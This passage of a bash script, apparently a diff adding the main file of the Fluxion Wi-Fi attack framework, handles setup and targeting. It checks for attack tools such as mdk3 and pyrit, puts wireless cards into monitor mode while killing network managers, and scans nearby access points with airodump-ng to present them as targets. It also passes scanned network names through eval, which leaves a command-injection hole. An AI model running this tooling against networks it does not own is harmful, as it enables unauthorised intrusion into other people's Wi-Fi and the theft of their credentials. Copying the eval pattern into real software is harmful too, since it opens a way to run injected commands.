"python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" + "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" + "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" + "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" + "fuser:psmisc" "killall:psmisc" + ) + + while ! installer_utils_check_dependencies requiredCLITools[@]; do + installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] + done + + echo -e "\n\n" # This echo is for spacing +} + +fluxion_shutdown() { + if [ $FLUXIONDebug ]; then return 1; fi + + # Show the header if the subroutine has already been loaded. + if type -t fluxion_header &> /dev/null; then + fluxion_header + fi + + echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" + + # Get running processes we might have to kill before exiting. + local processes + readarray processes < <(ps -A) + + # Currently, fluxion is only responsible for killing airodump-ng, since + # fluxion explicitly uses it to scan for candidate target access points. + # NOTICE: Processes started by subscripts, such as an attack script, + # MUST BE TERMINATED BY THAT SCRIPT in the subscript's abort handler. + local -r targets=("airodump-ng") + + local targetID # Program identifier/title + for targetID in "${targets[@]}"; do + # Get PIDs of all programs matching targetPID + local targetPID=$( + echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}' + ) + if [ ! "$targetPID" ]; then continue; fi + echo -e "$CWht[$CRed-$CWht] `io_dynamic_output $FLUXIONKillingProcessNotice`" + kill -s SIGKILL $targetPID &> $FLUXIONOutputDevice + done + + # Assure changes are reverted if installer was activated. + if [ "$PackageManagerCLT" ]; then + echo -e "$CWht[$CRed-$CWht] "$( + io_dynamic_output "$FLUXIONRestoringPackageManagerNotice" + )"$CClr" + unprep_package_manager + fi + + # If allocated interfaces exist, deallocate them now. + if [ ${#FluxionInterfaces[@]} -gt 0 ]; then + local interface + for interface in "${!FluxionInterfaces[@]}"; do + # Only deallocate fluxion or airmon-ng created interfaces. + if [[ "$interface" == "flux"* || "$interface" == *"mon"* ]]; then + fluxion_deallocate_interface $interface + fi + done + fi + + echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingCleaningIPTablesNotice$CClr" + if [ -f "$FLUXIONIPTablesBackup" ]; then + iptables-restore <"$FLUXIONIPTablesBackup" \ + &> $FLUXIONOutputDevice + else + iptables --flush + iptables --table nat --flush + iptables --delete-chain + iptables --table nat --delete-chain + fi + + echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr" + tput cnorm + + if [ ! $FLUXIONDebug ]; then + echo -e "$CWht[$CRed-$CWht] $FLUXIONDeletingFilesNotice$CClr" + sandbox_remove_workfile "$FLUXIONWorkspacePath/*" + fi + + if [ $FLUXIONWIKillProcesses ]; then + echo -e "$CWht[$CRed-$CWht] $FLUXIONRestartingNetworkManagerNotice$CClr" + + # TODO: Add support for other network managers (wpa_supplicant?). + if [ $(which systemctl) ]; then + if [ $(which service) ];then + service network-manager restart &> $FLUXIONOutputDevice & + service networkmanager restart &> $FLUXIONOutputDevice & + service networking restart &> $FLUXIONOutputDevice & + fi + else + systemctl restart network-manager.service &> $FLUXIONOutputDevice & + fi + fi + + echo -e "$CWht[$CGrn+$CWht] $CGrn$FLUXIONCleanupSuccessNotice$CClr" + echo -e "$CWht[$CGrn+$CWht] $CGry$FLUXIONThanksSupportersNotice$CClr" + + sleep 3 + + clear + + exit 0 +} + + +# ============================================================ # +# ================= < Handler Subroutines > ================== # +# ============================================================ # +# Delete log only in Normal Mode ! +fluxion_conditional_clear() { + # Clear iff we're not in debug mode + if [ ! $FLUXIONDebug ]; then clear; fi +} + +fluxion_conditional_bail() { + echo ${1:-"Something went wrong, whoops! (report this)"} + sleep 5 + if [ ! $FLUXIONDebug ]; then + fluxion_handle_exit + return 1 + fi + echo "Press any key to continue execution..." + read bullshit +} + +# ERROR Report only in Developer Mode +if [ $FLUXIONDebug ]; then + function fluxion_error_report() { + echo "Exception caught @ line #$1" + } + + trap 'fluxion_error_report $LINENO' ERR +fi + +fluxion_handle_abort_attack() { + if [ $(type -t stop_attack) ]; then + stop_attack &> $FLUXIONOutputDevice + unprep_attack &> $FLUXIONOutputDevice + else + echo "Attack undefined, can't stop anything..." > $FLUXIONOutputDevice + fi +} + +# In case of abort signal, abort any attacks currently running. +trap fluxion_handle_abort_attack SIGABRT + +fluxion_handle_exit() { + fluxion_handle_abort_attack + fluxion_shutdown + exit 1 +} + +# In case of unexpected termination, run fluxion_shutdown. +trap fluxion_handle_exit SIGINT SIGHUP + + +# ============================================================ # +# =============== < Resolution & Positioning > =============== # +# ============================================================ # +fluxion_set_resolution() { # Windows + Resolution + + # Get dimensions + SCREEN_SIZE=$(xdpyinfo | grep dimension | awk '{print $4}' | tr -d "(") + SCREEN_SIZE_X=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $1}')) + SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}')) + + # Calculate proportional windows + PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) + NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) + + NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) + + SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) + SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) + + # Upper windows + TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" + TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" + TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" + + # Lower windows + BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" + BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" + BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" + + # Y mid + LEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-$SCREEN_SIZE_MID_Y" + RIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+$SCREEN_SIZE_MID_Y" + + # Big + TOPLEFTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y+0+0" + TOPRIGHTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y-0+0" +} + + +# ============================================================ # +# ================= < Sequencing Framework > ================= # +# ============================================================ # +# The following lists some problems with the framework's design. +# The list below is a list of DESIGN FLAWS, not framework bugs. +# * Sequenced undo instructions' return value is being ignored. +# * A global is generated for every new namespace being used. +# * It uses eval too much, but it's bash, so that's not so bad. +# TODO: Try to fix this or come up with a better alternative. +declare -rA FLUXIONUndoable=( \ + ["set"]="unset" \ + ["prep"]="unprep" \ + ["run"]="halt" \ + ["start"]="stop" \ +) + +# Yes, I know, the identifiers are fucking ugly. If only we had +# some type of mangling with bash identifiers, that'd be great. +fluxion_do() { + if [ ${#@} -lt 2 ]; then return -1; fi + + local -r __fluxion_do__namespace=$1 + local -r __fluxion_do__identifier=$2 + + # Notice, the instruction will be adde to the Do Log + # regardless of whether it succeeded or failed to execute. + eval FXDLog_$__fluxion_do__namespace+=\("$__fluxion_do__identifier"\) + eval ${__fluxion_do__namespace}_$__fluxion_do__identifier "${@:3}" + return $? +} + +fluxion_undo() { + if [ ${#@} -ne 1 ]; then return -1; fi + + local -r __fluxion_undo__namespace=$1 + + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + eval local __fluxion_undo__history=\("\${FXDLog_$__fluxion_undo__namespace[@]}"\) + + eval echo \$\{FXDLog_$__fluxion_undo__namespace[@]\} \ + > $FLUXIONOutputDevice + + local __fluxion_undo__i + for (( __fluxion_undo__i=${#__fluxion_undo__history[@]}; \ + __fluxion_undo__i > 0; __fluxion_undo__i-- )); do + local __fluxion_undo__instruction=${__fluxion_undo__history[__fluxion_undo__i-1]} + local __fluxion_undo__command=${__fluxion_undo__instruction%%_*} + local __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} + + echo "Do ${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier" \ + > $FLUXIONOutputDevice + if eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then + echo "Undo-chain succeded." > $FLUXIONOutputDevice + eval FXDLog_$__fluxion_undo__namespace=\("${__fluxion_undo__history[@]::$__fluxion_undo__i}"\) + eval echo History\: \$\{FXDLog_$__fluxion_undo__namespace[@]\} \ + > $FLUXIONOutputDevice + return 0 + fi + done + + return -2 # The undo-chain failed. +} + +fluxion_done() { + if [ ${#@} -ne 1 ]; then return -1; fi + + local -r __fluxion_done__namespace=$1 + + eval "FluxionDone=\${FXDLog_$__fluxion_done__namespace[-1]}" + + if [ ! "$FluxionDone" ]; then return 1; fi +} + +fluxion_done_reset() { + if [ ${#@} -ne 1 ]; then return -1; fi + + local -r __fluxion_done_reset__namespace=$1 + + eval FXDLog_$__fluxion_done_reset__namespace=\(\) +} + +fluxion_do_sequence() { + if [ ${#@} -ne 2 ]; then return -1; fi + + # TODO: Implement an alternative, better method of doing + # what this subroutine does, maybe using for-loop iteFLUXIONWindowRation. + # The for-loop implementation must support the subroutines + # defined above, including updating the namespace tracker. + + local -r __fluxion_do_sequence__namespace=$1 + + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local __fluxion_do_sequence__sequence=("${!2}") + + if [ ${#__fluxion_do_sequence__sequence[@]} -eq 0 ]; then + return -2 + fi + + local -A __fluxion_do_sequence__index=() + + local i + for i in $(seq 0 $((${#__fluxion_do_sequence__sequence[@]} - 1))); do + __fluxion_do_sequence__index["${__fluxion_do_sequence__sequence[i]}"]=$i + done + + # Start sequence with the first instruction available. + local __fluxion_do_sequence__instructionIndex=0 + local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} + while [ "$__fluxion_do_sequence__instruction" ]; do + if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then + if ! fluxion_undo $__fluxion_do_sequence__namespace; then + return -2 + fi + + # Synchronize the current instruction's index by checking last. + if ! fluxion_done $__fluxion_do_sequence__namespace; then + return -3; + fi + + __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} + + if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then + return -4 + fi + else + let __fluxion_do_sequence__instructionIndex++ + fi + + __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[$__fluxion_do_sequence__instructionIndex]} + echo "Running next: $__fluxion_do_sequence__instruction" \ + > $FLUXIONOutputDevice + done +} + + +# ============================================================ # +# ================= < Load All Subroutines > ================= # +# ============================================================ # +fluxion_header() { + format_apply_autosize "[%*s]\n" + local verticalBorder=$FormatApplyAutosize + + format_apply_autosize "[%*s${CSRed}FLUXION $FLUXIONVersion${CSWht}.${CSBlu}$FLUXIONRevision$CSRed <$CIRed F${CIYel}luxion$CIRed I${CIYel}s$CIRed T${CIYel}he$CIRed F${CIYel}uture$CClr$CSYel >%*s$CSBlu]\n" + local headerTextFormat="$FormatApplyAutosize" + + fluxion_conditional_clear + + echo -e "$(printf "$CSRed$verticalBorder" "" | sed -r "s/ /~/g")" + printf "$CSRed$verticalBorder" "" + printf "$headerTextFormat" "" "" + printf "$CSBlu$verticalBorder" "" + echo -e "$(printf "$CSBlu$verticalBorder" "" | sed -r "s/ /~/g")$CClr" + echo + echo +} + +# ======================= < Language > ======================= # +fluxion_unset_language() { + FluxionLanguage="" + + if [ "$FLUXIONLanguagePreferencesFile" ]; then + sed -i.backup "/FluxionLanguage=.\+/ d" "$FLUXIONLanguagePreferencesFile" + fi +} + +fluxion_set_language() { + if [ ! "$FluxionLanguage" ]; then + # Get all languages available. + local languageCodes + readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') + + local languages + readarray -t languages < <( + head -n 3 language/*.sh | + grep -E "^# native: " | + sed -E 's/# \w+: //' + ) + + io_query_format_fields "$FLUXIONVLine Select your language" \ + "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" \ + languageCodes[@] languages[@] + + FluxionLanguage=${IOQueryFormatFields[0]} + + echo # Do not remove. + fi + + # Check if all language files are present for the selected language. + find -type d -name language | while read language_dir; do + if [ ! -e "$language_dir/${FluxionLanguage}.sh" ]; then + echo -e "$FLUXIONVLine ${CYel}Warning${CClr}, missing language file:" + echo -e "\t$language_dir/${FluxionLanguage}.sh" + return 1 + fi + done + + if [ $? -eq 1 ]; then # If a file is missing, fall back to english. + echo -e "\n\n$FLUXIONVLine Falling back to English..."; sleep 5 + FluxionLanguage="en" + fi + + source "$FLUXIONPath/language/$FluxionLanguage.sh" + + if [ "$FLUXIONLanguagePreferencesFile" ]; then + if more $FLUXIONLanguagePreferencesFile | \ + grep -q "FluxionLanguage=.\+" &> /dev/null; then + sed -r "s/FluxionLanguage=.+/FluxionLanguage=$FluxionLanguage/g" \ + -i.backup "$FLUXIONLanguagePreferencesFile" + else + echo "FluxionLanguage=$FluxionLanguage" >> "$FLUXIONLanguagePreferencesFile" + fi + fi +} + +# ====================== < Interfaces > ====================== # +declare -A FluxionInterfaces=() # Global interfaces' registry. + +fluxion_deallocate_interface() { # Release interfaces + if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi + + local -r oldIdentifier=$1 + local -r newIdentifier=${FluxionInterfaces[$oldIdentifier]} + + # Assure the interface is in the allocation table. + if [ ! "$newIdentifier" ]; then return 2; fi + + local interfaceIdentifier=$newIdentifier + echo -e "$CWht[$CSRed-$CWht] "$( + io_dynamic_output "$FLUXIONDeallocatingInterfaceNotice" + )"$CClr" + + if interface_is_wireless $oldIdentifier; then + # Attempt deactivating monitor mode on the interface. + if ! interface_set_mode $oldIdentifier managed; then + return 3 + fi + fi + + # If interface was allocated by airmon-ng, deallocate with it. + if [[ "$oldIdentifier" == *"mon"* ]]; then + if ! airmon-ng stop $oldIdentifier &> $FLUXIONOutputDevice; then + return 4 + fi + else + # Attempt to restore the original interface identifier. + if ! interface_reidentify $oldIdentifier $newIdentifier; then + return 5 + fi + fi + + # Once successfully renamed, remove from allocation table. + unset FluxionInterfaces[$oldIdentifier] + unset FluxionInterfaces[$newIdentifier] +} + +# Parameters: +# ------------------------------------------------------------ # +# Return 1: No interface identifier was passed. +# Return 2: Interface identifier given points to no interface. +# Return 3: Unable to determine interface's driver. +# Return 4: Fluxion failed to reidentify interface. +# Return 5: Interface allocation failed (identifier missing). +fluxion_allocate_interface() { # Reserve interfaces + if [ ! "$1" ]; then return 1; fi + + local -r identifier=$1 + + # If the interface is already in allocation table, we're done. + if [ "${FluxionInterfaces[$identifier]+x}" ]; then + return 0 + fi + + if ! interface_is_real $identifier; then return 2; fi + + + local interfaceIdentifier=$identifier + echo -e "$CWht[$CSGrn+$CWht] "$( + io_dynamic_output "$FLUXIONAllocatingInterfaceNotice" + )"$CClr" + + + if interface_is_wireless $identifier; then + # Unblock wireless interfaces to make them available. + echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" + rfkill unblock all &> $FLUXIONOutputDevice + + if [ "$FLUXIONWIReloadDriver" ]; then + # Get selected interface's driver details/info-descriptor. + echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice" + + if ! interface_driver "$identifier"; then + echo -e "$FLUXIONVLine$CRed $FLUXIONUnknownWIDriverError" + sleep 3 + return 3 + fi + + # Notice: This local is function-scoped, not block-scoped. + local -r driver="$InterfaceDriver" + + # Unload the driver module from the kernel. + rmmod -f $driver &> $FLUXIONOutputDevice + + # Wait while interface becomes unavailable. + echo -e "$FLUXIONVLine "$( + io_dynamic_output $FLUXIONUnloadingWIDriverNotice + ) + while interface_physical "$identifier"; do + sleep 1 + done + fi + + if [ "$FLUXIONWIKillProcesses" ]; then + # Get list of potentially troublesome programs. + echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice" + + # Kill potentially troublesome programs. + echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice" + + # TODO: Make the loop below airmon-ng independent. + # Maybe replace it with a list of network-managers? + # WARNING: Version differences could break code below. + for program in "$(airmon-ng check | awk 'NR>6{print $2}')"; do + killall "$program" &> $FLUXIONOutputDevice + done + fi + + if [ "$FLUXIONWIReloadDriver" ]; then + # Reload the driver module into the kernel. + modprobe "$driver" &> $FLUXIONOutputDevice + + # Wait while interface becomes available. + echo -e "$FLUXIONVLine "$( + io_dynamic_output $FLUXIONLoadingWIDriverNotice + ) + while ! interface_physical "$identifier"; do + sleep 1 + done + fi + + # Set wireless flag to prevent having to re-query. + local -r allocatingWirelessInterface=1 + fi + + # If we're using the interface library, reidentify now. + # If usuing airmon-ng, let airmon-ng rename the interface. + if [ ! $FLUXIONAirmonNG ]; then + echo -e "$FLUXIONVLine $FLUXIONReidentifyingInterface" + + # Prevent interface-snatching by renaming the interface. + if [ $allocatingWirelessInterface ]; then + interface_reidentify $identifier fluxwl${#FluxionInterfaces[@]} + else + interface_reidentify $identifier fluxet${#FluxionInterfaces[@]} + fi + + if [ $? -ne 0 ]; then # If reidentifying failed, abort immediately. + return 4 + fi + fi + + if [ $allocatingWirelessInterface ]; then + # Activate wireless interface monitor mode and save identifier. + echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice" + + # TODO: Consider the airmon-ng flag is set, monitor mode is + # already enabled on the interface being allocated, and the + # interface identifier is something non-airmon-ng standard. + # The interface could already be in use by something else. + # Snatching or crashing interface issues could occur. + + # NOTICE: Conditionals below populate newIdentifier on success. + if [ $FLUXIONAirmonNG ]; then + local -r newIdentifier=$( + airmon-ng start $identifier | + grep "monitor .* enabled" | + grep -oP "wl.*mon|mon[0-9]+" + ) + else + # Attempt activating monitor mode on the interface. + if interface_set_mode fluxwl${#FluxionInterfaces[@]} monitor; then + # Register the new identifier upon consecutive successes. + local -r newIdentifier=fluxwl${#FluxionInterfaces[@]} + else + # If monitor-mode switch fails, undo rename and abort. + interface_reidentify fluxwl${#FluxionInterfaces[@]} $identifier + fi + fi + fi + + # On failure to allocate the interface, we've got to abort. + # Notice: If the interface was already in monitor mode and + # airmon-ng is activated, WE didn't allocate the interface. + if [ ! "$newIdentifier" -o "$newIdentifier" = "$oldIdentifier" ]; then + echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocationFailedError" + sleep 3 + return 5 + fi + + # Register identifiers to allocation hash table. + FluxionInterfaces[$newIdentifier]=$identifier + FluxionInterfaces[$identifier]=$newIdentifier + + echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocatedNotice" + sleep 3 + + # Notice: Interfaces are accessed with their original identifier + # as the key for the global FluxionInterfaces hash/map/dictionary. +} + +# Parameters: [] +# Note: The interfaces lambda must print an interface per line. +# ------------------------------------------------------------ # +# Return -1: Go back +# Return 1: Missing interfaces lambda identifier (not passed). +fluxion_get_interface() { + if ! type -t "$1" &> /dev/null; then return 1; fi + + if [ "$2" ]; then + local -r interfaceQuery="$2" + else + local -r interfaceQuery=$FLUXIONInterfaceQuery + fi + + while true; do + local candidateInterfaces + readarray -t candidateInterfaces < <($1) + local interfacesAvailable=() + local interfacesAvailableInfo=() + local interfacesAvailableColor=() + local interfacesAvailableState=() + + # Gather information from all available interfaces. + local candidateInterface + for candidateInterface in "${candidateInterfaces[@]}"; do + if [ ! "$candidateInterface" ]; then + local skipOption=1 + continue + fi + + interface_chipset "$candidateInterface" + interfacesAvailableInfo+=("$InterfaceChipset") + + # If it has already been allocated, we can use it at will. + local candidateInterfaceAlt=${FluxionInterfaces["$candidateInterface"]} + if [ "$candidateInterfaceAlt" ]; then + interfacesAvailable+=("$candidateInterfaceAlt") + + interfacesAvailableColor+=("$CGrn") + interfacesAvailableState+=("[*]") + else + interfacesAvailable+=("$candidateInterface") + + interface_state "$candidateInterface" + + if [ "$InterfaceState" = "up" ]; then + interfacesAvailableColor+=("$CPrp") + interfacesAvailableState+=("[-]") + else + interfacesAvailableColor+=("$CClr") + interfacesAvailableState+=("[+]") + fi + fi + done + + # If only one interface exists and it's not unavailable, choose it. + if [ "${#interfacesAvailable[@]}" -eq 1 -a \ + "${interfacesAvailableState[0]}" != "[-]" -a \ + "$skipOption" == "" ]; then + FluxionInterfaceSelected="${interfacesAvailable[0]}" + FluxionInterfaceSelectedState="${interfacesAvailableState[0]}" + FluxionInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" + break + else + if [ $skipOption ]; then + interfacesAvailable+=("$FLUXIONGeneralSkipOption") + interfacesAvailableColor+=("$CClr") + fi + + interfacesAvailable+=( + "$FLUXIONGeneralRepeatOption" + "$FLUXIONGeneralBackOption" + ) + + interfacesAvailableColor+=( + "$CClr" + "$CClr" + ) + + format_apply_autosize \ + "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" + + io_query_format_fields \ + "$FLUXIONVLine $interfaceQuery" "$FormatApplyAutosize" \ + interfacesAvailableColor[@] interfacesAvailable[@] \ + interfacesAvailableState[@] interfacesAvailableInfo[@] + + echo + + case "${IOQueryFormatFields[1]}" in + "$FLUXIONGeneralSkipOption") + FluxionInterfaceSelected="" + FluxionInterfaceSelectedState="" + FluxionInterfaceSelectedInfo="" + return 0;; + "$FLUXIONGeneralRepeatOption") continue;; + "$FLUXIONGeneralBackOption") return -1;; + *) + FluxionInterfaceSelected="${IOQueryFormatFields[1]}" + FluxionInterfaceSelectedState="${IOQueryFormatFields[2]}" + FluxionInterfaceSelectedInfo="${IOQueryFormatFields[3]}" + break;; + esac + fi + done +} + + +# ============== < Fluxion Target Subroutines > ============== # +# Parameters: interface [ channel(s) [ band(s) ] ] +# ------------------------------------------------------------ # +# Return 1: Missing monitor interface. +# Return 2: Xterm failed to start airmon-ng. +# Return 3: Invalid capture file was generated. +# Return 4: No candidates were detected. +fluxion_target_get_candidates() { + # Assure a valid wireless interface for scanning was given. + if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi + + echo -e "$FLUXIONVLine $FLUXIONStartingScannerNotice" + echo -e "$FLUXIONVLine $FLUXIONStartingScannerTip" + + # Assure all previous scan results have been cleared. + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + + #if [ "$FLUXIONAuto" ]; then + # sleep 30 && killall xterm & + #fi + + # Begin scanner and output all results to "dump-01.csv." + if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG \ + -bg "#000000" -fg "#FFFFFF" -e \ + "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2> $FLUXIONOutputDevice; then + echo -e "$FLUXIONVLine$CRed $FLUXIONGeneralXTermFailureError" + sleep 5 + return 2 + fi + + # Sanity check the capture files generated by the scanner. + # If the file doesn't exist, or if it's empty, abort immediately. + if [ ! -f "$FLUXIONWorkspacePath/dump-01.csv" -o \ + ! -s "$FLUXIONWorkspacePath/dump-01.csv" ]; then + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + return 3 + fi + + # Syntheize scan opeFLUXIONWindowRation results from output file "dump-01.csv." + echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" + # WARNING: The code below may break with different version of airmon-ng. + # The times matching operator "{n}" isn't supported by mawk (alias awk). + # readarray FLUXIONTargetCandidates < <( + # gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' + # $FLUXIONWorkspacePath/dump-01.csv + # ) + # readarray FLUXIONTargetCandidatesClients < <( + # gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' + # $FLUXIONWorkspacePath/dump-01.csv + # ) + local -r matchMAC="([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]" + readarray FluxionTargetCandidates < <( + awk -F, "NF==15 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" \ + "$FLUXIONWorkspacePath/dump-01.csv" + ) + readarray FluxionTargetCandidatesClients < <( + awk -F, "NF==7 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" \ + "$FLUXIONWorkspacePath/dump-01.csv" + ) + + # Cleanup the workspace to prevent potential bugs/conflicts. + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + + if [ ${#FluxionTargetCandidates[@]} -eq 0 ]; then + echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice" + sleep 3 + return 4 + fi +} + + +fluxion_get_target() { + # Assure a valid wireless interface for scanning was given. + if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi + + local -r interface=$1 + + local choices=( \ + "$FLUXIONScannerChannelOptionAll (2.4GHz)" \ + "$FLUXIONScannerChannelOptionAll (5GHz)" \ + "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)" \ + "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption" + ) + + io_query_choice "$FLUXIONScannerChannelQuery" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONScannerChannelOptionAll (2.4GHz)") + fluxion_target_get_candidates $interface "" "bg";; + + "$FLUXIONScannerChannelOptionAll (5GHz)") + fluxion_target_get_candidates $interface "" "a";; + + "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") + fluxion_target_get_candidates $interface "" "abg";; + + "$FLUXIONScannerChannelOptionSpecific") + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONScannerChannelQuery" + echo + echo -e " $FLUXIONScannerChannelSingleTip ${CBlu}6$CClr " + echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1-5$CClr " + echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1,2,5-7,11$CClr " + echo + echo -ne "$FLUXIONPrompt" + + local channels + read channels + + echo + + fluxion_target_get_candidates $interface $channels;; + + "$FLUXIONGeneralBackOption") + return -1;; + esac + + # Abort if errors occured while searching for candidates. + if [ $? -ne 0 ]; then return 2; fi + + local candidatesMAC=() + local candidatesClientsCount=() + local candidatesChannel=() + local candidatesSecurity=() + local candidatesSignal=() + local candidatesPower=() + local candidatesESSID=() + local candidatesColor=() + + # Gather information from all the candidates detected. + # TODO: Clean up this for loop using a cleaner algorithm. + # Maybe try using array appending & [-1] for last elements. + for candidateAPInfo in "${FluxionTargetCandidates[@]}"; do + # Strip candidate info from any extraneous spaces after commas. + candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g") + + local i=${#candidatesMAC[@]} + + candidatesMAC[i]=$(echo "$candidateAPInfo" | cut -d , -f 1) + candidatesClientsCount[i]=$( + echo "${FluxionTargetCandidatesClients[@]}" | + grep -c "${candidatesMAC[i]}" + ) + candidatesChannel[i]=$(echo "$candidateAPInfo" | cut -d , -f 4) + candidatesSecurity[i]=$(echo "$candidateAPInfo" | cut -d , -f 6) + candidatesPower[i]=$(echo "$candidateAPInfo" | cut -d , -f 9) + candidatesColor[i]=$( + [ ${candidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr + ) + + # Parse any non-ascii characters by letting bash handle them. + # Escape all single quotes in ESSID and let bash's $'...' handle it. + local sanitizedESSID=$( + echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14 + ) + candidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'") + + local power=${candidatesPower[i]} + if [ $power -eq -1 ]; then + # airodump-ng's man page says -1 means unsupported value. + candidatesQuality[i]="??" + elif [ $power -le $FLUXIONNoiseFloor ]; then + candidatesQuality[i]=0 + elif [ $power -gt $FLUXIONNoiseCeiling ]; then + candidatesQuality[i]=100 + else + # Bash doesn't support floating point division, work around it... + # Q = ((P - F) / (C - F)); Q-quality, P-power, F-floor, C-Ceiling. + candidatesQuality[i]=$(( \ + (${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / \ + (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10) \ + )) + fi + done + + format_center_literals "WIFI LIST" + local -r headerTitle="$FormatCenterLiterals\n\n" + + format_apply_autosize "$CRed[$CSYel ** $CClr$CRed]$CClr %-*.*s %4s %3s %3s %2s %-8.8s %18s\n" + local -r headerFields=$( + printf "$FormatApplyAutosize" \ + "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID" + ) + + format_apply_autosize "$CRed[$CSYel%03d$CClr$CRed]%b %-*.*s %3s%% %3s %3d %2s %-8.8s %18s\n" + io_query_format_fields "$headerTitle$headerFields" \ + "$FormatApplyAutosize" \ + candidatesColor[@] \ + candidatesESSID[@] \ + candidatesQuality[@] \ + candidatesPower[@] \ + candidatesClientsCount[@] \ + candidatesChannel[@] \ + candidatesSecurity[@] 